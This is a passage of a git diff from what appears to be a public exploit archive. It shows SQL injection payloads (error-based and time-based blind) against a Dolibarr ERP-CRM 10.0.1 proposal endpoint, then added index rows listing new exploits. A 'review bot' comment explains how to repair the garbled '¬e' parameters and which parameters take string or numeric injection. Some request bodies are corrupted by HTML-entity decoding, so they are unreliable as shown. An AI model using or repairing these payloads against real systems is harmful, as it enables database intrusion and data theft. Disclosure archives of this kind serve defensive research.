+END))&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty + + Type: error-based + Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP +BY clause (FLOOR) + Payload: +token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0 +OR (SELECT 3789 FROM(SELECT COUNT(*),CONCAT(0x716a626b71,(SELECT +(ELT(3789=3789,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM +INFORMATION_SCHEMA.PLUGINS GROUP BY 
+x)a)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty + + Type: time-based blind + Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) + Payload: +token=$2y$10$L49yBo3dzNwsREPqDxRH8uR7HJ4eaM9ULG2yw1XgypioE2XZaw5lK&action=add&ref_client=&socid=140&re=09/09/2019&reday=09&remonth=09&reyear=2019&duree_validite=15&cond_reglement_id=0&mode_reglement_id=&demand_reason_id=0&availability_id=0 +AND (SELECT 9904 FROM +(SELECT(SLEEP(5)))ZKPW)&shipping_method_id=-1&date_livraison=&date_livraisonday=&date_livraisonmonth=&date_livraisonyear=&projectid=0&incoterm_id=0&location_incoterms=&model=azur&multicurrency_code=EUR¬e_public=¬e_private=&createmode=empty \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 70a3d4ab2..e8bdd9282 100644 --- a/files_exploits.csv +++ b/files_exploits.csv 
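Review bot: Every request body in this entry contains `¬e=`, `¬e_public=` and `¬e_private=` where the parameters must be `&note=`, `&note_public=` and `&note_private=` — the `&not` prefix was evidently decoded as an HTML entity somewhere in the pipeline, so copying the PoC as shown sends a parameter literally named `¬e` and drops the `&` separator; the bodies should be restored to `&note=...` before anyone reuses them. As with 47362 the cookie and `token` values are session-bound, so these are authenticated injections and the privilege required should be stated (presumably a user who can update an agenda event via `comm/action/card.php?action=update` and create a proposal via `comm/propal/card.php?action=add`). It is also worth telling readers that `actioncode` is injected in string context (`AC_OTH_AUTO'` followed by a `-- ` terminator) whereas `demand_reason_id` and `availability_id` are numeric and need no quote, since that decides which of the listed payloads applies to each parameter.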
@@ -41708,3 +41708,12 @@ id,file,description,date,author,type,platform,port 47350,exploits/php/webapps/47350.txt,"WordPress Plugin Download Manager 2.9.93 - Cross-Site Scripting",2019-09-04,MgThuraMoeMyint,webapps,php,80 47351,exploits/hardware/webapps/47351.txt,"DASAN Zhone ZNID GPON 2426A EU - Multiple Cross-Site Scripting",2019-09-04,"Adam Ziaja",webapps,hardware,80 47356,exploits/php/webapps/47356.txt,"Inventory Webapp - 'itemquery' SQL injection",2019-09-06,"mohammad zaheri",webapps,php, +47361,exploits/php/webapps/47361.pl,"WordPress 5.2.3 - Cross-Site Host Modification",2019-09-09,"Todor Donev",webapps,php, +47362,exploits/php/webapps/47362.txt,"Dolibarr ERP-CRM 10.0.1 - 'elemid' SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php, +47363,exploits/multiple/webapps/47363.html,"Enigma NMS 65.0.0 - Cross-Site Request Forgery",2019-09-09,mark,webapps,multiple, +47364,exploits/multiple/webapps/47364.py,"Enigma NMS 65.0.0 - OS Command Injection",2019-09-09,mark,webapps,multiple, +47365,exploits/multiple/webapps/47365.txt,"Enigma NMS 65.0.0 - SQL Injection",2019-09-09,mark,webapps,multiple, +47366,exploits/php/webapps/47366.txt,"Online Appointment - SQL Injection",2019-09-09,"mohammad zaheri",webapps,php, +47368,exploits/cgi/webapps/47368.sh,"Rifatron Intelligent Digital Security System - 'animate.cgi' Stream Disclosure",2019-09-09,LiquidWorm,webapps,cgi, +47369,exploits/php/webapps/47369.txt,"WordPress Plugin Sell Downloads 1.0.86 - Cross-Site Scripting",2019-09-09,"Mr Winst0n",webapps,php, +47370,exploits/php/webapps/47370.txt,"Dolibarr ERP-CRM 10.0.1 - SQL Injection",2019-09-09,"Metin Yunus Kandemir",webapps,php,